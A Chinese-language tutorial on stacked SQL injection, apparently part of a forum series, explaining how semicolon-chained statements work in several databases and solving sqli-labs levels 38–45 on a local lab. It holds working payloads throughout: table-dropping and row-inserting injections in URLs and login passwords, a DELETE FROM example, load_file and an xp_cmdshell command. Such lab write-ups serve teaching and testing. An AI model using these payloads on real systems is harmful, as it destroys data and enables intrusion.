本文是 mysql 注入天书连载第三篇
第一篇地址：https://xianzhi.aliyun.com/forum/read/314.html
第二篇地址：https://xianzhi.aliyun.com/forum/read/328.html
[hr]

第三部分/page-3 Stacked injection

Background-8 stacked injection

Stacked injections:堆叠注入。从名词的含义就可以看到应该是一堆sql语句（多条）一起执行。而在真实的运用中也是这样的，我们知道在mysql中，主要是命令行中，每一条语句结尾加 ;  表示语句结束。这样我们就想到了是不是可以多句一起使用。这个叫做stacked injection。

0x01 原理介绍

在SQL中，分号（;）是用来表示一条sql语句的结束。试想一下我们在 ; 结束一个sql语句后继续构造下一条语句，会不会一起执行？因此这个想法也就造就了堆叠注入。而union injection（联合注入）也是将两条语句合并在一起，两者之间有什么区别么？区别就在于union 或者union all执行的语句类型是有限的，可以用来执行查询语句，而堆叠注入可以执行的是任意的语句。
例如以下这个例子。
文本框: 用户输入：
1; DELETE FROM products
服务器端生成的sql语句为：（因未对输入的参数进行过滤）
Select * from products where productid=1;DELETE FROM products

当执行查询后，第一条显示查询信息，第二条则将整个表进行删除。

0x02 堆叠注入的局限性

堆叠注入的局限性在于并不是每一个环境下都可以执行，可能受到API或者数据库引擎不支持的限制，当然了权限不足也可以解释为什么攻击者无法修改数据或者调用一些程序。

Ps：此图是从原文中截取过来的，因为我个人的测试环境是php+mysql，是可以执行的，此处对于mysql/php存在质疑。但个人估计原文作者可能与我的版本的不同的原因。
虽然我们前面提到了堆叠查询可以执行任意的sql语句，但是这种注入方式并不是十分的完美的。在我们的web系统中，因为代码通常只返回一个查询结果，因此，堆叠注入第二个语句产生错误或者结果只能被忽略，我们在前端界面是无法看到返回结果的。
因此，在读取数据时，我们建议使用union（联合）注入。同时在使用堆叠注入之前，我们也是需要知道一些数据库相关信息的，例如表名，列名等信息。

0x03 各个数据库实例介绍

本节我们从常用数据库角度出发，介绍几个类型的数据库的相关用法。数据库的基本操作，增删查改。以下列出数据库相关堆叠注入的基本操作。

Mysql数据库
（1）新建一个表 select * from users where id=1;create table test like users;

执行成功，我们再去看一下是否新建成功表。

（2）删除上面新建的test表select * from users where id=1;drop table test;

（3）查询数据select * from users where id=1;select 1,2,3;

加载文件  select * from users where id=1;select load_file('c:/tmpupbbn.php');

（4）修改数据select * from users where id=1;insert into users(id,username,password)
values('100','new','new');

Sql server数据库
(1)增加数据表select * from test;create table sc3(ss CHAR(8));

(2)删除数据表select * from test;drop table sc3;

(3)查询数据select 1,2,3;select * from test;

(4)修改数据select * from test;update test set name='test' where id=3;

(5)sqlserver中最为重要的存储过程的执行
select * from test where id=1;exec master..xp_cmdshell 'ipconfig'

Oracle数据库
上面的介绍中我们已经提及，oracle不能使用堆叠注入，可以从图中看到，当有两条语句在同一行时，直接报错。无效字符。后面的就不往下继续尝试了。

Postgresql数据库
（1）新建一个表    select * from user_test;create table user_data(id DATE);

可以看到user_data表已经建好。
（2）删除上面新建的user_data表select * from user_test;delete from user_data;

(3)查询数据select * from user_test;select 1,2,3;

(4)修改数据 select * from user_test;update user_test set name='modify' where name='张三';

Less-38

学习了关于stacked injection的相关知识，我们在本关可以得到直接的运用。
在执行select时的sql语句为：SELECT * FROM users WHERE id='$id' LIMIT 0,1
可以直接构造如下的payload：
http://127.0.0.1/sqli-labs/Less-38/index.php?id=1%27;insert%20into%20users(id,username,password)%20values%20(%2738%27,%27less38%27,%27hello%27)--+

再看数据表中的内容：可以看到less38已经添加。

Less-39

和less-38的区别在于sql语句的不一样：SELECT * FROM users WHERE id=$id LIMIT 0,1
也就是数字型注入，我们可以构造以下的payload：
http://127.0.0.1/sqli-labs/Less-39/index.php?id=1;insert%20into%20users(id,username,password)%20values%20(%2739%27,%27less39%27,%27hello%27)--+

通过数据表中可以看到添加的less-39项。

Less-40

本关的sql语句为SELECT * FROM users WHERE id=('$id') LIMIT 0,1
我们根据sql语句构造以下的payload：
http://127.0.0.1/sqli-labs/Less-40/index.php?id=1%27);%20insert%20into%20users(id,username,password)%20values%20(%27109%27,%27hello%27,%27hello%27)%23

Less-41

此处与less-39是一致的，区别在于41错误不回显。所以我们称之为盲注。
Payload：
http://192.168.11.189/sqli-labs/Less-41/index.php?id=1;%20insert%20into%20users(id,username,password)%20values%20(%27110%27,%27less41%27,%27hello%27)%23

Less-42

Update更新数据后，经过mysql_real_escape_string()处理后的数据，存入到数据库当中后不会发生变化。在select调用的时候才能发挥作用。所以不用考虑在更新密码处进行注入，这关和二次注入的思路是不一样的。
本关从login.php源代码中分析可知：

Password变量在post过程中，没有通过mysql_real_escape_string()函数的处理。因此在登录的时候密码选项我们可以进行attack。
登录用户名随意
密码登录用以下的方式c';drop table me#             （删除me 表）
                    c';create table me like users#    （创建一个me 的表）
下面这张图是我们没有登录时数据库当中存在的表

此处登录username:admin
        Password:c';create table less42 like users#
原sql语句为  
$sql = "SELECT FROM users WHERE username='$username' and password='$password'";
登录时构造的sql语句为
SELECT FROM users WHERE username='admin' and password='c’;create table less42 like users#
利用stacked injection，我们成功执行创建数据表less42的语句。

从下图可以看出show tables后已经成功创建less42表。

利用c';drop table me#作为登录密码，删除该表。
同样的利用此方式可以更新和插入数据项，这里就不进行演示了。

Less-43

本关与42关的原理基本一致，我们还是定位在login.php中的password。看一下sql语句为:
$sql = "SELECT * FROM users WHERE username=('$username') and password=('$password')";
登录：username：admin
      Password：c');create table less43 like users#

可以看到在tables中已经出现了less-43表。

其他的操作这里就不进行演示了。

Less-44

本关是基于盲注的，这里盲注主要是要没有报错信息，所以要采用盲注。这关与42关的区别就在于没有报错信息，同时，我们使用同样方式的payload：
登录  username:admin
      Password:a';insert into users(id,username,password) values ('144','less44','hello')#

可以看到添加了less44这一项数据。

Less-45

同样的，45关与43关的payload是一样的，只不过45关依旧没有报错信息。
登录  username：admin
      Password：c');create table less45 like users#

创建less45的数据表，可从下图看到。